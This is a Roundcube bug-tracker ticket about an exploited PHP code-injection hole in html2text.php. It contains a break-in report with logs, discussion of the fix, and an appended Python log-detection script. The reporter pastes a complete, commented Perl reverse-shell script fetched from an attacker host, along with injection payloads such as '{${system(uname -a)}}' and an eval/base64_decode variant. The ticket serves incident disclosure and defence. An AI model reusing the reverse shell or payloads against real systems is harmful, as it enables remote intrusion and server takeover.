Opened 5 years ago

Closed 5 years ago

Last modified 4 years ago

#1485618 closed Bugs (fixed)

Break-in possibility via html2text.php?

Reported by: RealMurphy
Owned by:
Priority: 10 - Lowest
Milestone: later
Component: Security
Version: 0.2-beta
Severity: minor
Keywords: security
Cc: pnfisher@…

Description (last modified by till)

Hi all,

since I cannot reproduce this I try to describe this problem from the current installation status and not against trunk (sorry for that).

Last night someone broke into my apache-container via roundcube (99.9% sure here), the system is a current Debian Lenny, with these versions:

roundcube 0.2-beta
PHP is 5.2.6
mailserver is postfix on a remote virtual server

In the logs I have found the following:

apache's access.log:

192.168.100.2 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

192.168.100.2 is another webserver acting as a proxy to this webmail apache (i.e. just rewriting and forwarding the requests), the real IP was

200.171.152.187 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 502 595 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

In the error log I see this nasty bit at the same time:

--2008-12-08 23:05:16--  http://mmbt.co.uk/img/back.txt
Resolving mmbt.co.uk... 81.31.121.138
Connecting to mmbt.co.uk|81.31.121.138|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 541 [text/plain]
Saving to: `back.txt.1'

     0K                                                       100% 56.0M=0s

2008-12-08 23:05:16 (56.0 MB/s) - `back.txt.1' saved [541/541]

For completeness this is the script which was downloaded:

#!/usr/bin/perl
# Reverse shell: connects back to the host and port given on the command line
# and hands whoever is listening there an interactive /bin/sh.
use Socket;
$cmd= "lynx";                                        # name the process will show in ps
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';   # print kernel and uid banner, then start a shell
$0=$cmd;                                             # disguise the process as "lynx"
$target=$ARGV[0];                                    # attacker's host
$port=$ARGV[1];                                      # attacker's listening port
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");       # outbound connection, so inbound filtering does not help
open(STDIN, ">&SOCKET");                             # wire the shell's stdin, stdout and stderr to the socket
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);                                     # runs until the attacker closes the shell
close(STDIN);
close(STDOUT);
close(STDERR);

There is nothing in either console, errors or sendmail in Roundcube's log messages.

Since I believe this is potentially dangerous (and this incident happened to put my box onto several blacklists for sending out >50k spam emails) I've bumped up the severity.

Anything else you could need from me?

Cheers

Carsten

Change History (20)

comment:1 Changed 5 years ago by alec

  • Component changed from PHP backend to Security issue
  • Milestone changed from later to 0.2-stable

comment:2 Changed 5 years ago by ziba

bin/html2text.php does use html_entity_decode which had a security issue:
http://www.juniper.net/security/auto/vulnerabilities/vuln17296.html

but that was supposed to be fixed in PHP 5.1.3-RC1

comment:3 Changed 5 years ago by ksteinhoff

Why do you suspect html2text.php? The time stamp on error log entry you quote is 23:05:16 and the time stamps in your transfer log lines begin at 23:07:50.

comment:4 Changed 5 years ago by RealMurphy

OK, trying to do it better this time. html2text.php was the only call with POST data. Unless I'm mistaken, you will not be able to break into a system with a GET, right? The initial copy & paste was not covering the full log file, sorry about that. This is the full access.log:

192.168.100.2 - - [08/Dec/2008:17:41:46 +0100] "GET /roundcube/skins/default/images/display/info.png HTTP/1.1" 200 2162 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:04:51 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:04:55 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 79 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:04:59 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 88 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:38 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:06:26 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "http://www.google.com/search?hl=en&q=intitle:%22RoundCube+Webmail%22+site:com&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:27 +0100] "GET /roundcube/skins/default/images/favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:28 +0100] "GET /roundcube/skins/default/common.css HTTP/1.1" 200 6680 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:28 +0100] "GET /roundcube/program/js/common.js HTTP/1.1" 200 16650 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:29 +0100] "GET /roundcube/program/js/app.js HTTP/1.1" 200 110423 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/roundcube_logo.png HTTP/1.1" 200 4868 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/listheader_aqua.gif HTTP/1.1" 200 270 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/buttons/bg.gif HTTP/1.1" 200 211 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:40 +0100] "GET /roundcube/program/js/tiny_mce/r.php HTTP/1.1" 200 33924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:41 +0100] "GET /roundcube/program/js/tiny_mce/r.php HTTP/1.1" 200 33924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [09/Dec/2008:06:55:28 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.168.100.2 - - [09/Dec/2008:12:56:27 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"

comment:5 Changed 5 years ago by estadtherr

If I understand the description, a vulnerability in html2text.php allowed an attacker to cause your web server to download a malicious perl script (is back.txt the perl script or is back.txt yet another file?) This perl script opens a socket to a host/port specified on its command line and hooks a command shell's input/output to that socket. Through this remote shell, the attacker was able to send out spam from your server.

How did the attacker get the perl script to execute? Are there two vulnerabilities, i.e. allowing a download and allowing execution of an arbitrary script?

comment:6 Changed 5 years ago by RealMurphy

It looks like back.txt is the local file name of the Perl script. Since I just see the wget output and not the command line, it's hard to tell. wget downloaded this file to /tmp and also a zip file named jess.zip, which I still have to figure out (sorry for not mentioning this earlier, I forgot to look where back.txt would be on the system):

webmail:/tmp# file jess.zip
jess.zip: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
webmail:/tmp# ldd jess.zip
        not a dynamic executable

Of course this is not a zip file but a root exploit; running strings shows:

Linux vmsplice Local Root Exploit
 By qaaz
!@#$

OK, rounding it up again: it seems that the multiple POST requests were used to download the Perl script and the root exploit, and were possibly also used for starting it; however, I still don't know how they might have achieved that part, but my knowledge there is rather limited.

comment:7 Changed 5 years ago by till

  • Description modified (diff)
  • Keywords security added

comment:8 Changed 5 years ago by till

That's interesting and we haven't really analyzed this yet, but the quickfix to this issue is to install mod_security on the server. GotRoot has a bunch of filter rules and they catch this stuff easily.

Not the solution to the problem, but a workaround.

Thanks for reporting!

comment:9 Changed 5 years ago by alec

  • Resolution set to fixed
  • Status changed from new to closed

Found vulnerable preg_replace() use. Fixed in [f50cc72c], but we'll know for sure when we get POST data used for attack. Closing the ticket now.

comment:10 Changed 5 years ago by RealMurphy

I'm still running 0.2-beta as a kind of honeypot. During the night from Saturday to Sunday someone tried the same hack again, but this line did not really log much:

file_put_contents('/var/log/roundcube/hack', date('r').': '.print_r($_REQUEST, true)."\n", FILE_APPEND);

The result:

Sun, 21 Dec 2008 02:42:28 +0100: Array
(
)

Sun, 21 Dec 2008 02:42:32 +0100: Array
(
)

Sun, 21 Dec 2008 02:42:54 +0100: Array
(
)

Apache log lines:

192.168.100.2 - - [21/Dec/2008:02:42:27 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [21/Dec/2008:02:42:32 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 79 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [21/Dec/2008:02:42:54 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

I leave this issue closed but may add more info on the exploit if I get some.

comment:11 Changed 5 years ago by alec

check variables_order in php.ini and set to "GPC"

comment:12 Changed 5 years ago by RealMurphy

Done, waiting for next attack

comment:13 Changed 5 years ago by pnfisher

  • Cc pnfisher@… added

We had someone probe our system for the html2text.php exploit today. I've removed the "Host" header, which was properly set.

POST /rc/bin/html2text.php HTTP/1.1
Pragma: no-cache
Accept: */*
Content-Type: ''
Connection: Keep-Alive
Content-Length: 28

<b>{${system(uname -a)}}</b>

comment:14 Changed 5 years ago by alec

This bug is known as CVE-2008-5619

comment:15 Changed 5 years ago by paul

We were also attacked through html2text.php. The hacker tried to install a backdoor, probably using 'b{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}/b' as POST data, as explained on http://zastita.com/015038/roundcube-webmail-.html.
In the announcement of the security update for Roundcube 0.2 Beta, you might have mentioned that 0.1 Stable was also vulnerable.
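
An added detection example, written for this page and not part of the ticket or of Roundcube: it runs the request pattern from the access logs posted in comment 4 and the payloads quoted in comments 13 and 15 over constructed sample lines (modelled on the logs above, not taken from a real server). The two log heuristics are assumptions of this example: bin/html2text.php is only requested by the compose UI, and a genuine search-engine crawler fetches with GET, so a POST carrying a Googlebot user-agent is spoofed. The Accept-header check likewise assumes, following the write-up linked above, that the second-stage code arrives base64-encoded in that header.

```python
import base64
import binascii
import re

# Constructed sample log lines, modelled on the access.log excerpts posted in
# this ticket; they are not copied from any real server.
SAMPLE_ACCESS_LOG = """\
192.168.100.2 - - [08/Dec/2008:23:04:51 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:06:26 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [09/Dec/2008:06:55:28 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.168.100.2 - - [21/Dec/2008:02:42:54 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
"""

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP's complex (curly) string syntax, which the posted payloads rely on:
# {${ expr }} inside a double-quoted string evaluates expr.
PHP_COMPLEX_RE = re.compile(r'\{\s*\$|\$\s*\{')

# Strings that, if found in a decoded header, mark it as PHP code rather than MIME types.
PHP_CODE_MARKERS = ('<?php', 'eval(', 'system(', 'passthru(', 'shell_exec(', 'base64_decode(')


def parse_clf(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def suspicious_requests(log_text):
    """Flag log lines matching the attack pattern seen in this ticket.

    Assumptions (heuristics of this example, not Roundcube behaviour):
      * only the compose UI POSTs to bin/html2text.php, so a direct POST is unusual;
      * real crawlers use GET, so a POST with a Googlebot user-agent is spoofed.
    """
    hits = []
    for line in log_text.splitlines():
        r = parse_clf(line)
        if r is None:
            continue
        reasons = []
        if r['method'] == 'POST' and r['path'].endswith('/bin/html2text.php'):
            reasons.append('POST to bin/html2text.php')
        if r['method'] == 'POST' and 'Googlebot' in r['ua']:
            reasons.append('crawler user-agent on a POST')
        if reasons:
            hits.append({'ts': r['ts'], 'ip': r['ip'], 'path': r['path'], 'reasons': reasons})
    return hits


def is_php_injection(body):
    """True if a request body carries PHP complex-string syntax such as {${...}}."""
    text = body.decode('latin-1') if isinstance(body, bytes) else body
    return PHP_COMPLEX_RE.search(text) is not None


def suspicious_accept_header(value):
    """True if an Accept header is a base64 blob that decodes to PHP code.

    A legitimate Accept value ("*/*", "text/html,...") is not valid base64, so
    strict decoding rejects it; an arbitrary base64 token that happens to
    decode is only flagged when the plaintext contains a PHP marker.
    """
    try:
        decoded = base64.b64decode(value.strip(), validate=True)
    except (binascii.Error, ValueError):
        return False
    text = decoded.decode('latin-1').lower()
    return any(marker in text for marker in PHP_CODE_MARKERS)


if __name__ == '__main__':
    for hit in suspicious_requests(SAMPLE_ACCESS_LOG):
        print(hit['ts'], hit['ip'], hit['path'], '; '.join(hit['reasons']))
    print(is_php_injection(b'<b>{${system(uname -a)}}</b>'))
```

Run it against a real access.log by replacing SAMPLE_ACCESS_LOG with the file contents; the body and header checks are the same tests a mod_security rule of the kind mentioned in comment 8 would apply before the request reaches PHP. Both checks are signature-based, so they catch this family of payloads and nothing more; the actual fix is the single-quoted replacement (or a callback) in html2text.php.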

comment:16 follow-up: Changed 5 years ago by stuge

A customer of mine was also hit by this.

While [f50cc72c] fixes the problem in a perfectly safe manner and also adds proper handling for multibyte characters (excellent!) no analysis I have read so far has been completely correct about what is really going on.

preg_replace() with the e modifier allows execution of PHP code, but that's not the problem.

Before the superior fix in [f50cc72c], the problem was how entries in the html2text::$replace array were written like so:

      'strtoupper("\\1")',                    // <b>

instead of:

      'strtoupper(\'\\1\')',                    // <b>

When using double quotes in the strtoupper() call, any text which is replaced into there from the POST data can contain complex strings and will have those complex strings processed by PHP, when the entire argument really must be handled as untrusted input.

Using single quotes clarifies to the PHP interpreter that this is data which should not be processed further, so any complex strings will be ignored.

comment:17 in reply to: ↑ 16 Changed 5 years ago by stuge

Replying to stuge:

no analysis I have read so far has been completely correct about what is really going on.

To be fair, Jacobo Avariento Gimeno at Sofistic described the problem accurately, but didn't point out the double quotes in the function call.

comment:18 Changed 4 years ago by gittar

  • Milestone changed from 0.2-stable to later
  • Priority changed from 5 to 10 - Lowest
  • Severity changed from critical to minor

Well, I think you are lucky to have read the logs in time and identified the script; I have found many people who are totally unaware of the fact that there is a script running on their mail server to send spam mails. I think you need to check the server cache for this purpose; there might be other (unusual) activity on the server, like increasing page impressions, or compare the bandwidth of two consecutive days at that time. I would like to suggest an AVG download to avoid these situations. Thanks

comment:20 Changed 4 years ago by alec

  • Milestone set to later
  • Version set to 0.2-beta

Re-assigned Milestone and Version

comment:21 Changed 4 years ago by tbbw

I can confirm that people have started to make auto-infection scripts for this vuln.
Just yesterday I got a Perl IRC bot through this hole that has its nest on Undernet.
Some .ro kiddies farming.

They scan common webmail locations, so until this is fixed it's best to change your webmail URL to something cryptic instead of myhost.com/webmail or myhost.com/mail.
